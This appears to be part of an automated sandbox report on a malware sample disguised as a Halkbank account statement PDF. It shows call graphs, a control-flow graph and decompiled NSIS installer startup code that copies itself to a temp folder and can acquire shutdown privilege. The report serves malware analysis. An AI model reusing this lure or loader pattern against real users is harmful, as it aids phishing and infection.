4779->4787 4782->4755 4783 404b56 4785 406a35 5 API calls 4783->4785 4784 404c8e 4786 406a35 5 API calls 4784->4786 4785->4759 4793 404c95 4786->4793 4788 404c15 lstrcmpiW 4787->4788 4788->4782 4791 404c26 lstrcatW 4788->4791 4789 404cd6 4815 406668 lstrcpynW 4789->4815 4791->4782 4792 404cdd 4794 405fe2 4 API calls 4792->4794 4793->4789 4797 405f83 2 API calls 4793->4797 4799 404d2e 4793->4799 4795 404ce3 GetDiskFreeSpaceW 4794->4795 4798 404d07 MulDiv 4795->4798 4795->4799 4797->4793 4798->4799 4801 404f3a 20 API calls 4799->4801 4809 404d9f 4799->4809 4800 404dc2 4816 4045e6 EnableWindow 4800->4816 4803 404d8c 4801->4803 4802 40140b 2 API calls 4802->4800 4805 404da1 SetDlgItemTextW 4803->4805 4806 404d91 4803->4806 4805->4809 4807 404e71 20 API calls 4806->4807 4807->4809 4808 404dde 4808->4760 4810 404a0e SendMessageW 4808->4810 4809->4800 4809->4802 4810->4760 4811->4756 4812->4783 4813->4765 4814->4784 4815->4792 4816->4808 4817 401d38 4818 402d84 17 API calls 4817->4818 4819 401d3f 4818->4819 4820 402d84 17 API calls 4819->4820 4821 401d4b GetDlgItem 4820->4821 4822 402638 4821->4822 4823 4014b8 4824 4014be 4823->4824 4825 401389 2 API calls 4824->4825 4826 4014c6 4825->4826 4827 40563e 4828 405662 4827->4828 4829 40564e 4827->4829 4832 40566a IsWindowVisible 4828->4832 4838 405681 4828->4838 4830 405654 4829->4830 4831 4056ab 4829->4831 4834 404610 SendMessageW 4830->4834 4833 4056b0 CallWindowProcW 4831->4833 4832->4831 4835 405677 4832->4835 4836 40565e 4833->4836 4834->4836 4837 404f7f 5 API calls 4835->4837 4837->4838 4838->4833 4839 404fff 4 API calls 4838->4839 4839->4831 4840 40263e 4841 402652 4840->4841 4842 40266d 4840->4842 4843 402d84 17 API calls 4841->4843 4844 402672 4842->4844 4845 40269d 4842->4845 4854 402659 4843->4854 4847 402da6 17 API calls 4844->4847 4846 402da6 17 API calls 4845->4846 4849 4026a4 lstrlenW 4846->4849 4848 402679 4847->4848 4857 40668a WideCharToMultiByte 4848->4857 4849->4854 4851 40268d lstrlenA 4851->4854 4852 4026e7 4853 4026d1 4853->4852 4855 40620a WriteFile 4853->4855 4854->4852 4854->4853 4856 406239 5 API calls 4854->4856 4855->4852 4856->4853 4857->4851

                                                      Executed Functions

                                                      Function 00403640 Relevance: 91.4, APIs: 34, Strings: 18, Instructions: 450stringfilecomCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 403640-403690 SetErrorMode GetVersionExW 1 403692-4036c6 GetVersionExW 0->1 2 4036ca-4036d1 0->2 1->2 3 4036d3 2->3 4 4036db-40371b 2->4 3->4 5 40371d-403725 call 406a35 4->5 6 40372e 4->6 5->6 11 403727 5->11 8 403733-403747 call 4069c5 lstrlenA 6->8 13 403749-403765 call 406a35 * 3 8->13 11->6 20 403776-4037d8 #17 OleInitialize SHGetFileInfoW call 406668 GetCommandLineW call 406668 13->20 21 403767-40376d 13->21 28 4037e1-4037f4 call 405f64 CharNextW 20->28 29 4037da-4037dc 20->29 21->20 25 40376f 21->25 25->20 32 4038eb-4038f1 28->32 29->28 33 4038f7 32->33 34 4037f9-4037ff 32->34 37 40390b-403925 GetTempPathW call 40360f 33->37 35 403801-403806 34->35 36 403808-40380e 34->36 35->35 35->36 38 403810-403814 36->38 39 403815-403819 36->39 47 403927-403945 GetWindowsDirectoryW lstrcatW call 40360f 37->47 48 40397d-403995 DeleteFileW call 4030d0 37->48 38->39 41 4038d9-4038e7 call 405f64 39->41 42 40381f-403825 39->42 41->32 58 4038e9-4038ea 41->58 45 403827-40382e 42->45 46 40383f-403878 42->46 51 403830-403833 45->51 52 403835 45->52 53 403894-4038ce 46->53 54 40387a-40387f 46->54 47->48 62 403947-403977 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40360f 47->62 64 40399b-4039a1 48->64 65 403b6c-403b7a ExitProcess OleUninitialize 48->65 51->46 51->52 52->46 56 4038d0-4038d4 53->56 57 4038d6-4038d8 53->57 54->53 60 403881-403889 54->60 56->57 63 4038f9-403906 call 406668 56->63 57->41 58->32 66 403890 60->66 67 40388b-40388e 60->67 62->48 62->65 63->37 69 4039a7-4039ba call 405f64 64->69 70 403a48-403a4f call 403d17 64->70 72 403b91-403b97 65->72 73 403b7c-403b8b call 405cc8 ExitProcess 65->73 66->53 67->53 67->66 88 403a0c-403a19 69->88 89 4039bc-4039f1 69->89 83 403a54-403a57 70->83 74 403b99-403bae GetCurrentProcess OpenProcessToken 72->74 75 403c0f-403c17 72->75 80 403bb0-403bd9 LookupPrivilegeValueW AdjustTokenPrivileges 74->80 81 403bdf-403bed call 406a35 74->81 84 403c19 75->84 85 403c1c-403c1f ExitProcess 75->85 80->81 95 403bfb-403c06 ExitWindowsEx 81->95 96 403bef-403bf9 81->96 83->65 84->85 90 403a1b-403a29 call 40603f 88->90 91 403a5c-403a70 call 405c33 lstrcatW 88->91 93 4039f3-4039f7 89->93 90->65 104 403a2f-403a45 call 406668 * 2 90->104 107 403a72-403a78 lstrcatW 91->107 108 403a7d-403a97 lstrcatW lstrcmpiW 91->108 98 403a00-403a08 93->98 99 4039f9-4039fe 93->99 95->75 101 403c08-403c0a call 40140b 95->101 96->95 96->101 98->93 103 403a0a 98->103 99->98 99->103 101->75 103->88 104->70 107->108 109 403b6a 108->109 110 403a9d-403aa0 108->110 109->65 112 403aa2-403aa7 call 405b99 110->112 113 403aa9 call 405c16 110->113 119 403aae-403abe SetCurrentDirectoryW 112->119 113->119 121 403ac0-403ac6 call 406668 119->121 122 403acb-403af7 call 406668 119->122 121->122 126 403afc-403b17 call 4066a5 DeleteFileW 122->126 129 403b57-403b61 126->129 130 403b19-403b29 CopyFileW 126->130 129->126 132 403b63-403b65 call 406428 129->132 130->129 131 403b2b-403b4b call 406428 call 4066a5 call 405c4b 130->131 131->129 140 403b4d-403b54 CloseHandle 131->140 132->109 140->129
                                                      C-Code - Quality: 78%
                                                      			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				WCHAR* _t92;
				char* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t119;
				intOrPtr* _t123;
				void* _t137;
				void* _t143;
				void* _t148;
				void* _t152;
				void* _t157;
				signed int _t167;
				void* _t170;
				void* _t175;
				intOrPtr _t177;
				intOrPtr _t178;
				intOrPtr* _t179;
				int _t188;
				void* _t189;
				void* _t198;
				signed int _t204;
				signed int _t209;
				signed int _t214;
				signed int _t216;
				int* _t218;
				signed int _t226;
				signed int _t229;
				CHAR* _t231;
				char* _t232;
				signed int _t233;
				WCHAR* _t234;
				void* _t250;

				_t216 = 0x20;
				_t188 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x42a318 = _v324.dwBuildNumber;
				 *0x42a31c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x42a31e != 0x600) {
					_t179 = E00406A35(_t188);
					if(_t179 != _t188) {
						 *_t179(0xc00);
					}
				}
				_t231 = "UXTHEME";
				do {
					E004069C5(_t231); // executed
					_t231 =  &(_t231[lstrlenA(_t231) + 1]);
				} while ( *_t231 != 0);
				E00406A35(0xb);
				 *0x42a264 = E00406A35(9);
				_t88 = E00406A35(7);
				if(_t88 != _t188) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x42a31c =  *0x42a31c | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t188); // executed
				 *0x42a320 = _t88;
				SHGetFileInfoW(0x421708, _t188,  &_v1016, 0x2b4, _t188); // executed
				E00406668(0x429260, L"NSIS Error");
				_t92 = GetCommandLineW();
				_t232 = L"\"C:\\Users\\jones\\Desktop\\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe\"";
				E00406668(_t232, _t92);
				_t94 = _t232;
				_t233 = 0x22;
				 *0x42a260 = 0x400000;
				_t250 = L"\"C:\\Users\\jones\\Desktop\\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe\"" - _t233; // 0x22
				if(_t250 == 0) {
					_t216 = _t233;
					_t94 =  &M00435002;
				}
				_t198 = CharNextW(E00405F64(_t94, _t216));
				_v16 = _t198;
				while(1) {
					_t97 =  *_t198;
					_t251 = _t97 - _t188;
					if(_t97 == _t188) {
						break;
					}
					_t209 = 0x20;
					__eflags = _t97 - _t209;
					if(_t97 != _t209) {
						L17:
						__eflags =  *_t198 - _t233;
						_v12 = _t209;
						if( *_t198 == _t233) {
							_v12 = _t233;
							_t198 = _t198 + 2;
							__eflags = _t198;
						}
						__eflags =  *_t198 - 0x2f;
						if( *_t198 != 0x2f) {
							L32:
							_t198 = E00405F64(_t198, _v12);
							__eflags =  *_t198 - _t233;
							if(__eflags == 0) {
								_t198 = _t198 + 2;
								__eflags = _t198;
							}
							continue;
						} else {
							_t198 = _t198 + 2;
							__eflags =  *_t198 - 0x53;
							if( *_t198 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t214 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t226 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t214;
								__eflags =  *_t198 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214);
								if( *_t198 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t209 = L" /D=" & 0x0000ffff;
									asm("cdq");
									_t229 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t209;
									__eflags =  *(_t198 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209);
									if( *(_t198 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209)) {
										L31:
										_t233 = 0x22;
										goto L32;
									}
									__eflags =  *_t198 - _t229;
									if( *_t198 == _t229) {
										 *(_t198 - 4) = _t188;
										__eflags = _t198;
										E00406668(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t198);
										L37:
										_t234 = L"C:\\Users\\jones\\AppData\\Local\\Temp\\";
										GetTempPathW(0x400, _t234);
										_t116 = E0040360F(_t198, _t251);
										_t252 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(L"1033"); // executed
											_t118 = E004030D0(_t254, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t188) {
												L68:
												ExitProcess(); // executed
												__imp__OleUninitialize(); // executed
												if(_v8 == _t188) {
													if( *0x42a2f4 == _t188) {
														L77:
														_t119 =  *0x42a30c;
														if(_t119 != 0xffffffff) {
															_v24 = _t119;
														}
														ExitProcess(_v24);
													}
													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t188, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t188,  &_v40, _t188, _t188, _t188);
													}
													_t123 = E00406A35(4);
													if(_t123 == _t188) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
														_push(0x80040002);
														_push(0x25);
														_push(_t188);
														_push(_t188);
														_push(_t188);
														if( *_t123() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
												E00405CC8(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x42a27c == _t188) {
												L51:
												 *0x42a30c =  *0x42a30c | 0xffffffff;
												_v24 = E00403D17(_t264);
												goto L68;
											}
											_t218 = E00405F64(L"\"C:\\Users\\jones\\Desktop\\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe\"", _t188);
											if(_t218 < L"\"C:\\Users\\jones\\Desktop\\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe\"") {
												L48:
												_t263 = _t218 - L"\"C:\\Users\\jones\\Desktop\\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe\"";
												_v8 = L"Error launching installer";
												if(_t218 < L"\"C:\\Users\\jones\\Desktop\\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe\"") {
													_t189 = E00405C33(__eflags);
													lstrcatW(_t234, L"~nsu");
													__eflags = _t189;
													if(_t189 != 0) {
														lstrcatW(_t234, "A");
													}
													lstrcatW(_t234, L".tmp");
													_t219 = L"C:\\Users\\jones\\Desktop";
													_t137 = lstrcmpiW(_t234, L"C:\\Users\\jones\\Desktop");
													__eflags = _t137;
													if(_t137 == 0) {
														L67:
														_t188 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t189;
														_push(_t234);
														if(_t189 == 0) {
															E00405C16();
														} else {
															E00405B99();
														}
														SetCurrentDirectoryW(_t234);
														__eflags = L"C:\\Users\\jones\\AppData\\Local\\Temp"; // 0x43
														if(__eflags == 0) {
															E00406668(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t219);
														}
														E00406668(0x42b000, _v16);
														_t201 = "A" & 0x0000ffff;
														_t143 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t143;
														_v12 = 0x1a;
														 *0x42b800 = _t143;
														do {
															E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x120)));
															DeleteFileW(0x420f08);
															__eflags = _v8;
															if(_v8 != 0) {
																_t148 = CopyFileW(L"C:\\Users\\jones\\Desktop\\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe", 0x420f08, 1);
																__eflags = _t148;
																if(_t148 != 0) {
																	E00406428(_t201, 0x420f08, 0);
																	E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x124)));
																	_t152 = E00405C4B(0x420f08);
																	__eflags = _t152;
																	if(_t152 != 0) {
																		CloseHandle(_t152);
																		_v8 = 0;
																	}
																}
															}
															 *0x42b800 =  *0x42b800 + 1;
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E00406428(_t201, _t234, 0);
														goto L67;
													}
												}
												 *_t218 = _t188;
												_t221 =  &(_t218[2]);
												_t157 = E0040603F(_t263,  &(_t218[2]));
												_t264 = _t157;
												if(_t157 == 0) {
													goto L68;
												}
												E00406668(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t221);
												E00406668(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t221);
												_v8 = _t188;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t204 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t167 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t209 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
											while( *_t218 != _t204 || _t218[1] != _t167) {
												_t218 = _t218;
												if(_t218 >= L"\"C:\\Users\\jones\\Desktop\\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe\"") {
													continue;
												}
												break;
											}
											_t188 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(_t234, 0x3fb);
										lstrcatW(_t234, L"\\Temp");
										_t170 = E0040360F(_t198, _t252);
										_t253 = _t170;
										if(_t170 != 0) {
											goto L40;
										}
										GetTempPathW(0x3fc, _t234);
										lstrcatW(_t234, L"Low");
										SetEnvironmentVariableW(L"TEMP", _t234);
										SetEnvironmentVariableW(L"TMP", _t234);
										_t175 = E0040360F(_t198, _t253);
										_t254 = _t175;
										if(_t175 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t198 + 4)) - _t226;
								if( *((intOrPtr*)(_t198 + 4)) != _t226) {
									goto L29;
								}
								_t177 =  *((intOrPtr*)(_t198 + 8));
								__eflags = _t177 - 0x20;
								if(_t177 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t177 - _t188;
								if(_t177 != _t188) {
									goto L29;
								}
								goto L28;
							}
							_t178 =  *((intOrPtr*)(_t198 + 2));
							__eflags = _t178 - _t209;
							if(_t178 == _t209) {
								L23:
								 *0x42a300 = 1;
								goto L24;
							}
							__eflags = _t178 - _t188;
							if(_t178 != _t188) {
								goto L24;
							}
							goto L23;
						}
					} else {
						goto L16;
					}
					do {
						L16:
						_t198 = _t198 + 2;
						__eflags =  *_t198 - _t209;
					} while ( *_t198 == _t209);
					goto L17;
				}
				goto L37;
			}



















































                                                      0x0040364e
                                                      0x0040364f
                                                      0x00403656
                                                      0x00403659
                                                      0x00403660
                                                      0x00403663
                                                      0x00403676
                                                      0x0040367c
                                                      0x0040367f
                                                      0x00403682
                                                      0x00403690
                                                      0x00403698
                                                      0x004036a3
                                                      0x004036bc
                                                      0x004036be
                                                      0x004036c6
                                                      0x004036c6
                                                      0x004036d1
                                                      0x004036d3
                                                      0x004036d3
                                                      0x004036e8
                                                      0x0040370d
                                                      0x0040371b
                                                      0x0040371e
                                                      0x00403725
                                                      0x0040372c
                                                      0x0040372c
                                                      0x00403725
                                                      0x0040372e
                                                      0x00403733
                                                      0x00403734
                                                      0x00403740
                                                      0x00403744
                                                      0x0040374b
                                                      0x00403759
                                                      0x0040375e
                                                      0x00403765
                                                      0x00403769
                                                      0x0040376d
                                                      0x0040376f
                                                      0x0040376f
                                                      0x0040376d
                                                      0x00403776
                                                      0x0040377d
                                                      0x00403783
                                                      0x0040379b
                                                      0x004037ab
                                                      0x004037b0
                                                      0x004037b6
                                                      0x004037bd
                                                      0x004037c4
                                                      0x004037c6
                                                      0x004037c7
                                                      0x004037d1
                                                      0x004037d8
                                                      0x004037da
                                                      0x004037dc
                                                      0x004037dc
                                                      0x004037ef
                                                      0x004037f1
                                                      0x004038eb
                                                      0x004038eb
                                                      0x004038ee
                                                      0x004038f1
                                                      0x00000000
                                                      0x00000000
                                                      0x004037fb
                                                      0x004037fc
                                                      0x004037ff
                                                      0x00403808
                                                      0x00403808
                                                      0x0040380b
                                                      0x0040380e
                                                      0x00403811
                                                      0x00403814
                                                      0x00403814
                                                      0x00403814
                                                      0x00403815
                                                      0x00403819
                                                      0x004038d9
                                                      0x004038e2
                                                      0x004038e4
                                                      0x004038e7
                                                      0x004038ea
                                                      0x004038ea
                                                      0x004038ea
                                                      0x00000000
                                                      0x0040381f
                                                      0x00403820
                                                      0x00403821
                                                      0x00403825
                                                      0x0040383f
                                                      0x00403846
                                                      0x00403859
                                                      0x0040385a
                                                      0x0040386f
                                                      0x00403874
                                                      0x00403876
                                                      0x00403878
                                                      0x00403894
                                                      0x0040389b
                                                      0x004038ae
                                                      0x004038af
                                                      0x004038c4
                                                      0x004038ca
                                                      0x004038cc
                                                      0x004038ce
                                                      0x004038d6
                                                      0x004038d8
                                                      0x00000000
                                                      0x004038d8
                                                      0x004038d2
                                                      0x004038d4
                                                      0x004038f9
                                                      0x004038fd
                                                      0x00403906
                                                      0x0040390b
                                                      0x00403911
                                                      0x0040391c
                                                      0x0040391e
                                                      0x00403923
                                                      0x00403925
                                                      0x0040397d
                                                      0x00403982
                                                      0x0040398b
                                                      0x00403992
                                                      0x00403995
                                                      0x00403b6c
                                                      0x00403b6c
                                                      0x00403b71
                                                      0x00403b7a
                                                      0x00403b97
                                                      0x00403c0f
                                                      0x00403c0f
                                                      0x00403c17
                                                      0x00403c19
                                                      0x00403c19
                                                      0x00403c1f
                                                      0x00403c1f
                                                      0x00403bae
                                                      0x00403bba
                                                      0x00403bcb
                                                      0x00403bd2
                                                      0x00403bd9
                                                      0x00403bd9
                                                      0x00403be1
                                                      0x00403bed
                                                      0x00403bfb
                                                      0x00403c06
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00403bef
                                                      0x00403bef
                                                      0x00403bf0
                                                      0x00403bf2
                                                      0x00403bf3
                                                      0x00403bf4
                                                      0x00403bf9
                                                      0x00403c08
                                                      0x00403c0a
                                                      0x00000000
                                                      0x00403c0a
                                                      0x00000000
                                                      0x00403bf9
                                                      0x00403bed
                                                      0x00403b84
                                                      0x00403b8b
                                                      0x00403b8b
                                                      0x004039a1
                                                      0x00403a48
                                                      0x00403a48
                                                      0x00403a54
                                                      0x00000000
                                                      0x00403a54
                                                      0x004039b2
                                                      0x004039ba
                                                      0x00403a0c
                                                      0x00403a0c
                                                      0x00403a12
                                                      0x00403a19
                                                      0x00403a67
                                                      0x00403a69
                                                      0x00403a6e
                                                      0x00403a70
                                                      0x00403a78
                                                      0x00403a78
                                                      0x00403a83
                                                      0x00403a88
                                                      0x00403a8f
                                                      0x00403a95
                                                      0x00403a97
                                                      0x00403b6a
                                                      0x00403b6a
                                                      0x00403b6a
                                                      0x00000000
                                                      0x00403a9d
                                                      0x00403a9d
                                                      0x00403a9f
                                                      0x00403aa0
                                                      0x00403aa9
                                                      0x00403aa2
                                                      0x00403aa2
                                                      0x00403aa2
                                                      0x00403aaf
                                                      0x00403ab7
                                                      0x00403abe
                                                      0x00403ac6
                                                      0x00403ac6
                                                      0x00403ad3
                                                      0x00403adf
                                                      0x00403ae9
                                                      0x00403ae9
                                                      0x00403aeb
                                                      0x00403af2
                                                      0x00403afc
                                                      0x00403b08
                                                      0x00403b0e
                                                      0x00403b14
                                                      0x00403b17
                                                      0x00403b21
                                                      0x00403b27
                                                      0x00403b29
                                                      0x00403b2d
                                                      0x00403b3e
                                                      0x00403b44
                                                      0x00403b49
                                                      0x00403b4b
                                                      0x00403b4e
                                                      0x00403b54
                                                      0x00403b54
                                                      0x00403b4b
                                                      0x00403b29
                                                      0x00403b57
                                                      0x00403b5e
                                                      0x00403b5e
                                                      0x00403b5e
                                                      0x00403b5e
                                                      0x00403b65
                                                      0x00000000
                                                      0x00403b65
                                                      0x00403a97
                                                      0x00403a1b
                                                      0x00403a1e
                                                      0x00403a22
                                                      0x00403a27
                                                      0x00403a29
                                                      0x00000000
                                                      0x00000000
                                                      0x00403a35
                                                      0x00403a40
                                                      0x00403a45
                                                      0x00000000
                                                      0x00403a45
                                                      0x004039c3
                                                      0x004039db
                                                      0x004039ec
                                                      0x004039ed
                                                      0x004039f1
                                                      0x004039f3
                                                      0x00403a01
                                                      0x00403a08
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00403a08
                                                      0x00403a0a
                                                      0x00000000
                                                      0x00403a0a
                                                      0x0040392d
                                                      0x00403939
                                                      0x0040393e
                                                      0x00403943
                                                      0x00403945
                                                      0x00000000
                                                      0x00000000
                                                      0x0040394d
                                                      0x00403955
                                                      0x00403966
                                                      0x0040396e
                                                      0x00403970
                                                      0x00403975
                                                      0x00403977
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00403977
                                                      0x00000000
                                                      0x004038d4
                                                      0x0040387d
                                                      0x0040387f
                                                      0x00000000
                                                      0x00000000
                                                      0x00403881
                                                      0x00403885
                                                      0x00403889
                                                      0x00403890
                                                      0x00403890
                                                      0x00403890
                                                      0x00403890
                                                      0x00000000
                                                      0x00403890
                                                      0x0040388b
                                                      0x0040388e
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040388e
                                                      0x00403827
                                                      0x0040382b
                                                      0x0040382e
                                                      0x00403835
                                                      0x00403835
                                                      0x00000000
                                                      0x00403835
                                                      0x00403830
                                                      0x00403833
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00403833
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00403801
                                                      0x00403801
                                                      0x00403802
                                                      0x00403803
                                                      0x00403803
                                                      0x00000000
                                                      0x00403801
                                                      0x00000000

                                                      APIs
                                                      • SetErrorMode.KERNELBASE(00008001), ref: 00403663
                                                      • GetVersionExW.KERNEL32(?), ref: 0040368C
                                                      • GetVersionExW.KERNEL32(0000011C), ref: 004036A3
                                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040373A
                                                      • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403776
                                                      • OleInitialize.OLE32(00000000), ref: 0040377D
                                                      • SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 0040379B
                                                      • GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 004037B0
                                                      • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe",00000020,"C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe",00000000), ref: 004037E9
                                                      • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 0040391C
                                                      • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040392D
                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403939
                                                      • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040394D
                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403955
                                                      • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403966
                                                      • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040396E
                                                      • DeleteFileW.KERNELBASE(1033), ref: 00403982
                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403A69
                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 00403A78
                                                        • Part of subcall function 00405C16: CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403A83
                                                      • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe",00000000,?), ref: 00403A8F
                                                      • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AAF
                                                      • DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 00403B0E
                                                      • CopyFileW.KERNEL32(C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe,00420F08,00000001), ref: 00403B21
                                                      • CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000), ref: 00403B4E
                                                      • ExitProcess.KERNEL32(?), ref: 00403B6C
                                                      • OleUninitialize.OLE32(?), ref: 00403B71
                                                      • ExitProcess.KERNEL32 ref: 00403B8B
                                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403B9F
                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00403BA6
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BBA
                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BD9
                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 00403BFE
                                                      • ExitProcess.KERNEL32 ref: 00403C1F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
